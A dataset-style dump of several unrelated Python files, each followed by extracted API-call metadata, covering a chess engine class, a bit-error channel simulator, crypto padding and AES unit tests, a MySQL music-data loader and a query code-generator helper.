'(self._on_publish_done, response)\n', (8770, 8803), False, 'from functools import partial\n'), ((6547, 6579), 'contextlib.suppress', 'suppress', (['futures.CancelledError'], {}), '(futures.CancelledError)\n', (6555, 6579), False, 'from contextlib import suppress\n'), ((7888, 7947), 'aiocometd_chat_demo.exceptions.InvalidStateError', 'InvalidStateError', (['"""Uninitialized _connect_task attribute."""'], {}), "('Uninitialized _connect_task attribute.')\n", (7905, 7947), False, 'from aiocometd_chat_demo.exceptions import InvalidStateError\n')]
|
from gi.repository import GObject
from pychess.Players.Engine import Engine
from pychess.Utils.const import NORMAL, ANALYZING, INVERSE_ANALYZING
TIME_OUT_SECOND = 60
class ProtocolEngine(Engine):
__gsignals__ = {
"readyForOptions": (GObject.SignalFlags.RUN_FIRST, None, ()),
"readyForMoves": (GObject.SignalFlags.RUN_FIRST, None, ()),
}
# Setting engine options
def __init__(self, subprocess, color, protover, md5):
Engine.__init__(self, md5)
self.engine = subprocess
self.defname = subprocess.defname
self.color = color
self.protover = protover
self.readyMoves = False
self.readyOptions = False
self.connected = True
self.mode = NORMAL
self.analyzing_paused = False
def isAnalyzing(self):
return self.mode in (ANALYZING, INVERSE_ANALYZING)
|
[
"pychess.Players.Engine.Engine.__init__"
] |
[((463, 489), 'pychess.Players.Engine.Engine.__init__', 'Engine.__init__', (['self', 'md5'], {}), '(self, md5)\n', (478, 489), False, 'from pychess.Players.Engine import Engine\n')]
|
import numpy
class channel_noise_simulator:
"""Class to hold usefull funktions to simulate noise in a channel"""
def __init__(self):
return
# _____________create bits___________________
def create_random_bits_list(self, len):
"""create a random len bits long bitstring """
bits = []
for i in range(len):
bits.append(numpy.random.randint(0, 2))
return bits
def create_random_bits_string(self, len):
"""create a random len bits long string """
bits = ""
for i in range(len):
bits += str(numpy.random.randint(0, 2))
return bits
# _____________Randoise bits______________________
def randomise_bits_list(self, bits, probability):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1]
RETURN: a list of bits
"""
new_bits = []
for b in bits:
if probability > numpy.random.random(): # roll random numbers
new_bits.append((b + 1) % 2) # turn 0 to 1 and 1 to 0
else:
new_bits.append(b)
return new_bits
def randomise_bits_string(self, bits, probability):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1]
Return: a string full of bits
"""
new_bits = ""
for b in bits:
if probability > numpy.random.random(): # roll random numbers
new_bits += str((int(b) + 1) % 2) # turn 0 to 1 and 1 to 0
else:
new_bits += b
return new_bits
def randomise_bits_string_list(self, bits, probability):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1]
RETURN: a list of bits
"""
new_bits = []
for b in bits:
new_bit = ""
for i in range(len(b)):
if probability > numpy.random.random(): # roll random numbers
new_bit += str((int(b[i]) + 1) % 2) # turn 0 to 1 and 1 to 0
else:
new_bit += str(b[i])
new_bits.append(new_bit)
return new_bits
def randomise_bits_burst_string_list(
self, bits, burst_probability, error_rate_in_burst=0.9,
):
"""A function to simply flip bits with the given probability
ARGS: a String of bits, the probability for an error[0-1], the probability to leave the bursterror[0-1]
Return: String of bits with added burst error
"""
new_bits = []
currently_bursting = False
for b in bits:
i = 0
new_bits.append("")
while i < len(b):
if burst_probability > numpy.random.random(): # roll random numbers
currently_bursting = True
while currently_bursting and i < len(
b
): # stop when bitstream ends (simulate one bursterror and adjust i)
if error_rate_in_burst > numpy.random.random():
new_bits[len(new_bits) - 1] += str(
((int(b[i]) + 1) % 2)
) # turn 0 to 1 and 1 to 0 randomly
else:
new_bits[len(new_bits) - 1] += str(b[i])
currently_bursting = False
i += 1
else:
new_bits[len(new_bits) - 1] += str(b[i])
i += 1
return new_bits
def randomise_bits_burst_list(
self, bits, burst_probability, error_rate_in_burst=0.9
):
"""A function to simply flip bits with the given probability
ARGS: a list of bits, the probability for an error[0-1], the probability to leave the bursterror[0-1]
Return: list of bits with added burst erorrs
"""
new_bits = []
i = 0
while i < len(bits):
if burst_probability > numpy.random.random(): # roll random numbers
currently_bursting = True
while currently_bursting and i < len(
bits
): # stop when bitstream ends (simulate one bursterror and adjust i)
if error_rate_in_burst > numpy.random.random():
new_bits.append(
(bits[i] + 1) % 2
) # turn 0 to 1 and 1 to 0 randomly
else:
new_bits.append(bits[i])
currently_bursting = False
i += 1
else:
new_bits.append(bits[i])
i += 1
return new_bits
def randomise_bits_burst_string(
self, bits, burst_probability, error_rate_in_burst=0.9,
):
"""A function to simply flip bits with the given probability
ARGS: a String of bits, the probability for an error[0-1], the probability to leave the bursterror[0-1]
Return: String of bits with added burst erorrs
"""
new_bits = ""
i = 0
while i < len(bits):
if burst_probability > numpy.random.random(): # roll random numbers
currently_bursting = True
while currently_bursting and i < len(
bits
): # stop when bitstream ends (simulate one bursterror and adjust i)
if error_rate_in_burst > numpy.random.random():
new_bits += str(
((int(bits[i]) + 1) % 2)
) # turn 0 to 1 and 1 to 0 randomly
else:
new_bits += str(bits[i])
currently_bursting = False
i += 1
else:
new_bits += str(bits[i])
i += 1
return new_bits
# ______________compare bits__________________________
def compare_and_highlight_differences(self, bits1, bits2):
"""compare two bitlists and higlight the differences"""
differences = []
if len(bits1) != len(bits2):
print("waning, different lengths detected. may result in higher errorrate")
min_length = min(len(bits1), len(bits2))
for i in range(min_length):
differences.append(1 if bits1[i] != bits2[i] else 0)
print("Differences found: " + str(differences.count(True)))
return differences
# c=channel_noise_simulator()
# print (c.randomise_bits_list([1,1,1,1,0,0,0,0,1],0.5))
# print (c.randomise_bits_string("1101110",0.5))
# print (c.compare_and_highlight_differences([1,1,1,0,0,1,1,0,0,1,0,1,1,1],[0,1,1,0,0,1,1,1,1,1,0,1,0,1]))
# print (c.create_random_bits_list(200))
# rb= c.create_random_bits_string(200)
# rr = c.randomise_bits_burst_string(rb,0.01,.9)
# print (c.compare_and_highlight_differences(rb,rr))
# """
|
[
"numpy.random.randint",
"numpy.random.random"
] |
[((381, 407), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (401, 407), False, 'import numpy\n'), ((601, 627), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (621, 627), False, 'import numpy\n'), ((1019, 1040), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (1038, 1040), False, 'import numpy\n'), ((1537, 1558), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (1556, 1558), False, 'import numpy\n'), ((4238, 4259), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (4257, 4259), False, 'import numpy\n'), ((5434, 5455), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (5453, 5455), False, 'import numpy\n'), ((2118, 2139), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (2137, 2139), False, 'import numpy\n'), ((2937, 2958), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (2956, 2958), False, 'import numpy\n'), ((4537, 4558), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (4556, 4558), False, 'import numpy\n'), ((5733, 5754), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (5752, 5754), False, 'import numpy\n'), ((3253, 3274), 'numpy.random.random', 'numpy.random.random', ([], {}), '()\n', (3272, 3274), False, 'import numpy\n')]
|
# Copyright 2020 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: <NAME>
import unittest
from observatory.platform.cli.click_utils import (
INDENT1,
INDENT2,
INDENT3,
INDENT4,
comment,
indent,
)
class TestClick(unittest.TestCase):
def test_indent(self):
original_str = "hello world"
# 2 spaces
output = indent(original_str, INDENT1)
self.assertEqual(f" {original_str}", output)
# 3 spaces
output = indent(original_str, INDENT2)
self.assertEqual(f" {original_str}", output)
# 4 spaces
output = indent(original_str, INDENT3)
self.assertEqual(f" {original_str}", output)
# 5 spaces
output = indent(original_str, INDENT4)
self.assertEqual(f" {original_str}", output)
# Check that values below 0 raise assertion error
with self.assertRaises(AssertionError):
indent(original_str, 0)
with self.assertRaises(AssertionError):
indent(original_str, -1)
def test_comment(self):
input_str = ""
output = comment(input_str)
self.assertEqual(output, "# ")
input_str = "Hello world"
output = comment(input_str)
self.assertEqual(output, "# Hello world")
|
[
"observatory.platform.cli.click_utils.indent",
"observatory.platform.cli.click_utils.comment"
] |
[((884, 913), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT1'], {}), '(original_str, INDENT1)\n', (890, 913), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1005, 1034), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT2'], {}), '(original_str, INDENT2)\n', (1011, 1034), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1127, 1156), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT3'], {}), '(original_str, INDENT3)\n', (1133, 1156), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1250, 1279), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', 'INDENT4'], {}), '(original_str, INDENT4)\n', (1256, 1279), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1635, 1653), 'observatory.platform.cli.click_utils.comment', 'comment', (['input_str'], {}), '(input_str)\n', (1642, 1653), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1745, 1763), 'observatory.platform.cli.click_utils.comment', 'comment', (['input_str'], {}), '(input_str)\n', (1752, 1763), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1456, 1479), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', '(0)'], {}), '(original_str, 0)\n', (1462, 1479), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n'), ((1541, 1565), 'observatory.platform.cli.click_utils.indent', 'indent', (['original_str', '(-1)'], {}), '(original_str, -1)\n', (1547, 1565), False, 'from observatory.platform.cli.click_utils import INDENT1, INDENT2, INDENT3, INDENT4, comment, indent\n')]
|
#!/usr/bin/env/ python
# encoding: utf-8
"""
Test block crypto.
"""
import unittest
import matasano.blocks
import matasano.util
__author__ = 'aldur'
class BlocksTestCase(unittest.TestCase):
def test_split_blocks(self):
f = matasano.blocks.split_blocks
b = "this is a test".encode("ascii")
k_len = 3
blocks = f(b, k_len)
self.assertEqual(
len(blocks),
k_len
)
self.assertEqual(
sum(len(i) for i in blocks),
len(b)
)
l = list()
for i in range(len(blocks[0])):
for j in range(len(blocks)):
try:
l.append(blocks[j][i])
except IndexError:
pass
l = bytes(l)
self.assertEqual(
b, l
)
self.assertEqual(
b.decode("ascii"),
l.decode("ascii")
)
def test_pkcs_7(self):
b = "YELLOW SUBMARINE".encode("ascii")
size = 20
padded = matasano.blocks.pkcs_7(b, size)
self.assertEqual(len(padded), size)
self.assertEqual(padded, b + b"\x04" * 4)
size = 16
padded = matasano.blocks.pkcs_7(b, size)
self.assertEqual(len(padded), size * 2)
self.assertEqual(padded, b + (b"\x10" * size))
def test_pkcs_1_5(self):
b = "YELLOW SUBMARINE".encode("ascii")
size = 20
padded = matasano.blocks.pkcs_1_5(b, size)
self.assertEqual(
padded.to_bytes(size, "big"), b"\x00\x02\xff\x00" + b
)
unpadded = matasano.blocks.un_pkcs_1_5(padded, size)
self.assertEqual(
b, unpadded
)
self.assertRaises(
matasano.blocks.BadPaddingException,
matasano.blocks.un_pkcs_1_5,
padded << 1, size
)
def test_un_pkcs(self):
b = "YELLOW SUBMARINE".encode("ascii")
size = 20
padded = matasano.blocks.pkcs_7(b, size)
un_padded = matasano.blocks.un_pkcs_7(padded, size)
self.assertEqual(b, un_padded)
size = 16
padded = matasano.blocks.pkcs_7(b, size)
un_padded = matasano.blocks.un_pkcs_7(padded, size)
self.assertEqual(b, un_padded)
padded = b"ICE ICE BABY\x04\x04\x04\x04"
un_padded = matasano.blocks.un_pkcs_7(padded, size)
self.assertEqual(b"ICE ICE BABY", un_padded)
padded = b"ICE ICE BABY\x05\x05\x05\x05"
self.assertRaises(
matasano.blocks.BadPaddingException,
matasano.blocks.un_pkcs_7,
padded,
size
)
padded = b"ICE ICE BABY\x01\x02\x03\x04"
self.assertRaises(
matasano.blocks.BadPaddingException,
matasano.blocks.un_pkcs_7,
padded,
size
)
def test_aes_ecb(self):
f = matasano.blocks.aes_ecb
key = "YELLOW SUBMARINE".encode("ascii")
b = "00foobarfoobar00".encode("ascii")
self.assertEqual(
f(key, f(key, b), decrypt=True),
b
)
def test_aes_cbc(self):
f = matasano.blocks.aes_cbc
key = "YELLOW SUBMARINE".encode("ascii")
b = "00foobarfoobar00".encode("ascii")
iv = matasano.util.random_aes_key()
self.assertEqual(
f(key, f(key, b)[0], decrypt=True)[0],
b
)
self.assertEqual(
f(key, f(key, b, iv=iv)[0], decrypt=True, iv=iv)[0],
b
)
def test_aes_ctr(self):
f = matasano.blocks.aes_ctr
key = "YELLOW SUBMARINE".encode("ascii")
b = "00foobarfoobar00".encode("ascii")
self.assertEqual(
f(key, f(key, b)[0])[0],
b
)
def test_bytes_in_blocks(self):
f = matasano.blocks.bytes_in_block
size = 16
self.assertEqual(
f(size, 0),
slice(0, size)
)
self.assertEqual(
f(size, 1),
slice(size, size * 2)
)
def test_bytes_to_block(self):
f = matasano.blocks.bytes_to_block
size = 16
self.assertEqual(
f(size, 0),
slice(0, size)
)
self.assertEqual(
f(size, 1),
slice(0, size * 2)
)
self.assertEqual(
f(size, 10),
slice(0, size * 11)
)
def test_ith_byte_in_block(self):
f = matasano.blocks.ith_byte_block
size = 16
self.assertEqual(
f(size, 0),
0
)
self.assertEqual(
f(size, 1),
0
)
self.assertEqual(
f(size, size),
1
)
self.assertEqual(
f(size, size * 2),
2
)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((4893, 4908), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4906, 4908), False, 'import unittest\n')]
|
import pandas as pd
import mysql.connector
from mysql.connector import errorcode
import math
import sys
import csv
#Configuración de la conexión a Mysql
try:
cnx = mysql.connector.connect(user='user_taller1', password='<PASSWORD>.', host='127.0.0.1', database='taller1')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
cursor = cnx.cursor()
#Lectura del dataframe
columns_data = ['userId','timestamp','musicbrainz-artist-id', 'artist-name','trackId','trackname']
#df_use_habits= pd.DataFrame(columns = ['userId','timestamp','musicbrainz-artist-id', 'artist-name','trackId','trackname'])
df_artist= pd.DataFrame(columns = ['musicbrainz-artist-id', 'artist-name'])
df_tracks= pd.DataFrame(columns = ['trackId','trackname'] )
chunksize = 10 ** 6
#with pd.read_csv('data/userid-timestamp-artid-artname-traid-traname.tsv', encoding="utf-8", delimiter='\r', chunksize=chunksize, header=None) as reader:
with pd.read_csv('data/clean.tsv', encoding="utf-8", delimiter='\t', chunksize=chunksize, header=None, names=columns_data) as reader:
for chunk in reader:
df_artist = df_artist.append(chunk[['musicbrainz-artist-id', 'artist-name']])
df_tracks = df_tracks.append(chunk[['trackId','trackname']])
#print(df_artist)
print("Finish reading file and dtaframes")
# Remove duplicates
df_artist= df_artist.drop_duplicates(keep='first')
df_artist = df_artist.reset_index(drop=True)
df_tracks= df_tracks.drop_duplicates(keep='first')
df_tracks = df_tracks.reset_index(drop=True)
# Create a new record
sql_tracks = "INSERT INTO `tracks` (`music_track_id`, `music_track_name`) VALUES (%s, %s)"
sql_artists = "INSERT INTO `artists` (`music_artist_id`, `music_artist_name`) VALUES (%s, %s)"
def isNaN(string):
return string != string
for i in df_tracks.index:
# Execute the query
var1= None if isNaN(df_tracks['trackId'][i]) else ''.join([c for c in df_tracks['trackId'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C', '\u0027', '"']])
var2= None if isNaN(df_tracks['trackname'][i]) else ''.join([c for c in df_tracks['trackname'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C', '\u0027', '"']])
#print(var2)
try:
cursor.execute(sql_tracks, (var1,var2))
except mysql.connector.errors.DataError as err:
print("Track var 1: "+ var1+ " ")
print("Track var 2: "+ var2+ " ")
print("nooooo" + df_tracks['trackname'][i])
sys.exit(1)
# the connection is not autocommited by default. So we must commit to save our changes.
cnx.commit()
for i in df_artist.index:
# Execute the query
var1= None if isNaN(df_artist['musicbrainz-artist-id'][i]) else ''.join([c for c in df_artist['musicbrainz-artist-id'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C', '\u0027', '"']])
var2= None if isNaN(df_artist['artist-name'][i]) else ''.join([c for c in df_artist['artist-name'][i].strip() if c not in ['\t', '\n', '\f', '\r','\u000B','\u0085','\u2028','\u2029','\u0022', '\u005C','\u0027', '"' ]])
#print(var2)
try:
cursor.execute(sql_artists, (var1,var2))
except mysql.connector.errors.DataError as err:
print("Artists var 1: "+ var1+ " ")
print("Artists var 2: "+ var2+ " ")
sys.exit(1)
# the connection is not autocommited by default. So we must commit to save our changes.
cnx.commit()
#print(df_artist)
cursor.close()
cnx.close()
|
[
"pandas.DataFrame",
"pandas.read_csv",
"sys.exit"
] |
[((816, 878), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['musicbrainz-artist-id', 'artist-name']"}), "(columns=['musicbrainz-artist-id', 'artist-name'])\n", (828, 878), True, 'import pandas as pd\n'), ((892, 938), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['trackId', 'trackname']"}), "(columns=['trackId', 'trackname'])\n", (904, 938), True, 'import pandas as pd\n'), ((1121, 1243), 'pandas.read_csv', 'pd.read_csv', (['"""data/clean.tsv"""'], {'encoding': '"""utf-8"""', 'delimiter': '"""\t"""', 'chunksize': 'chunksize', 'header': 'None', 'names': 'columns_data'}), "('data/clean.tsv', encoding='utf-8', delimiter='\\t', chunksize=\n chunksize, header=None, names=columns_data)\n", (1132, 1243), True, 'import pandas as pd\n'), ((2690, 2701), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2698, 2701), False, 'import sys\n'), ((3524, 3535), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3532, 3535), False, 'import sys\n')]
|
from dogqc.code import Code
# includes
def getIncludes ():
code = Code()
code.add("#include <list>")
code.add("#include <unordered_map>")
code.add("#include <vector>")
code.add("#include <iostream>")
code.add("#include <ctime>")
code.add("#include <limits.h>")
code.add("#include <float.h>")
code.add("#include \"../dogqc/include/csv.h\"")
code.add("#include \"../dogqc/include/util.h\"")
code.add("#include \"../dogqc/include/mappedmalloc.h\"")
return code
def getCudaIncludes ():
code = Code()
code.add("#include \"../dogqc/include/util.cuh\"")
code.add("#include \"../dogqc/include/hashing.cuh\"")
return code
class Type ( object ):
MULTI_HT = "multi_ht"
UNIQUE_HT = "unique_ht"
AGG_HT = "agg_ht"
class Const ( object ):
ALL_LANES = "ALL_LANES"
class Krnl ( object ):
INIT_AGG_HT = "initAggHT"
INIT_ARRAY = "initArray"
INIT_UNIQUE_HT = "initUniqueHT"
INIT_MULTI_HT = "initMultiHT"
# functions
class Fct ( object ):
HASH_BUILD_UNIQUE = "hashBuildUnique"
HASH_PROBE_UNIQUE = "hashProbeUnique"
HASH_COUNT_MULTI = "hashCountMulti"
HASH_INSERT_MULTI = "hashInsertMulti"
HASH_PROBE_MULTI = "hashProbeMulti"
HASH = "hash"
HASH_AGG_BUCKET = "hashAggregateGetBucket"
HASH_AGG_CHECK = "hashAggregateFindBucket"
|
[
"dogqc.code.Code"
] |
[((71, 77), 'dogqc.code.Code', 'Code', ([], {}), '()\n', (75, 77), False, 'from dogqc.code import Code\n'), ((543, 549), 'dogqc.code.Code', 'Code', ([], {}), '()\n', (547, 549), False, 'from dogqc.code import Code\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.